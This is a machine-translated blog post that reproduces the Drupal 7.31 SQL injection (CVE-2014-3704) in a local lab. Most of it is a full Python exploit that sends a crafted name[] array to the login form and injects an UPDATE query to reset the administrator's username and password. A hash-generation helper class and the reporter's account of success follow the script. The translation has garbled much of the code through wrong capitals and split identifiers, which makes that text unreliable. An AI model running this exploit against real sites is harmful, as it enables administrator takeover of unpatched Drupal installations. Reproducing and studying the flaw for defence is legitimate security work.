is not a very new loophole, the record of their own replication thinking vulnerability impact:
Drupal 7.31
Drupal is an open source content management platform that provides support for millions of of websites and applications.
It is built, used and supported by an active and diverse community around the world.
0x01 Vulnerability Reappearance
Reproduce the Environment:
1) Apache2.4
2) PHP 7.0
3) Drupal 7.31 https://www.drupal.org/drupal-7.31-release-notes( Click to download )
Environment packaging in the directory installation can
Problems encountered in the middle:
workaround: Turn off extersion=php_mbstring.dll (note back up before modifying the original)
Exploit:
Original administrator account: root password: rootxxxx
Import urllib2,sysfrom drupalpass Import Drupalhash host = Sys.argv[1]user = Sys.argv[2]password = Sys.argv[3]if Len (sys.a RGV)! = 3:print "host username password" print "Http://nope.io admin wowsecure" hash = Drupalhash ("$S $CTO9G7LX28RZCF Pn4wb2hulkndkv6qtqhaf82wlbhpt2k5tzkzml ", password). Get_hash () target = '%s/?q=node&destination=node '% hostpost_ data = "Name[0%20;update+users+set+name%3d\" "+user +" ' +,+pass+%3d+ ' "+hash[:55] + "' +where+uid+%3d+\ ' 1\ ';; #%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=log+in " Content = Urllib2.urlopen (Url=target, Data=post_data). Read () if "Mb_strlen () expects parameter 1" in Content:print "Success!\nlogin now with user:%s and pass:%s"% (user, password) import hashlib# Calculate a non-truncated Drupal 7 compat ible Password hash.# The consumer of these hashes must truncate Correctly.class drupalhash:def __init__ (self, Stored_has h, password): Self.itoa64 = './0123456789abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz ' Self.last_hash = Self.rehash ( Stored_hash, password) def get_hash (self): return Self.last_hash def password_get_count_log2 (self, setting): Retur N Self.itoa64.index (setting[3]) def password_crypt (self, algo, password, setting): setting = Setting[0:12] If Setti NG[0]! = ' $ ' or setting[2]! = ' $ ': return False count_log2 = self.password_get_count_log2 (setting) Salt = Setti Ng[4:12] If Len (salt) < 8:return False count = 1 << count_log2 If algo = = ' MD5 ': Hash_func = Hashlib.md5 elif Algo = = ' sha512 ': Hash_func = hashlib.sha512 else:return False hash_str = Hash_func (s ALT + password). Digest () for C in range (count): Hash_str = hash_func (hash_str + password). Digest () output = set Ting + self.custom64 (hash_str) return output def custom64 (self, string, Count = 0): if count = = 0:count = Len (string) output = ' I =0 itoa64 = self.itoa64 while 1:value = Ord (String[i]) i + = 1 output + = Itoa64[value & 0x3f] If I < Count:value |= Ord (String[i]) << 8 output + = itoa64[(value >> 6) & 0x3f] if I >= Count:break i + = 1 if i < Count:value |= Ord (string[i]) << output + = Ito a64[(Value >>) & 0x3f] If I >= count:break i + = 1 output + = itoa64[(value >> ) & 0x3f] If I >= count:break return output def rehash (self, Stored_hash, password): # Drupal 6 compatibility If Len (stored_hash) = = + Stored_hash.find (' $ ') = = -1:return hashlib.md5 (password). hexdigest () # Drupal 7 if stored_hash[0:2] = = ' u$ ': Stored_hash = stored_hash[1:] Password = hashlib.md5 (password ). Hexdigest () Hash_type = Stored_hash[0:3] if Hash_type = = ' $S $ ': hash_str = Self.password_crypt (' sha512 ', pass Word, Stored_hash) elif Hash_type = = ' $H $ ' or hash_type = = ' $P $ ': hash_str = self.password_crypt (' MD5 ', password, stored_hash) Else: Hash_str = False return hash_str
I'm not compiling here.
Http://127.0.0.1/drupal-7.31/node?destination=node
Click Login here to post to modify the query statement, insert the UPDATE SQL statement directly change the Administrator account password.
Here's the encrypted way to call the official password-hash.sh to generate their own hash
Here's an error.
found two online public hash to update .
$S $DKIKDKLIVRK0IVHM99X7B/M8QC17E1TP/KMOD1IE8V/PGWJTAZLD---->thanks
$S $CTO9G7LX2MJRSYWMLH3NRTXL6AWJT35FZEP9OBYJKWEZMHOGQF.S--->[email protected]
Payload:
Direct Update User: Owned password: [email protected]
from the database query back results or MySQL monitoring can be seen, the administrator's user name and password are reset. owned user is promoted to administrator, and password is set to [email protected].
Ref
- http://0day5.com/archives/2310/
- Http://www.freebuf.com/vuls/47690.html
[cve-2014-3704] Drupal 7.31 SQL Injection Vulnerability Analysis and replication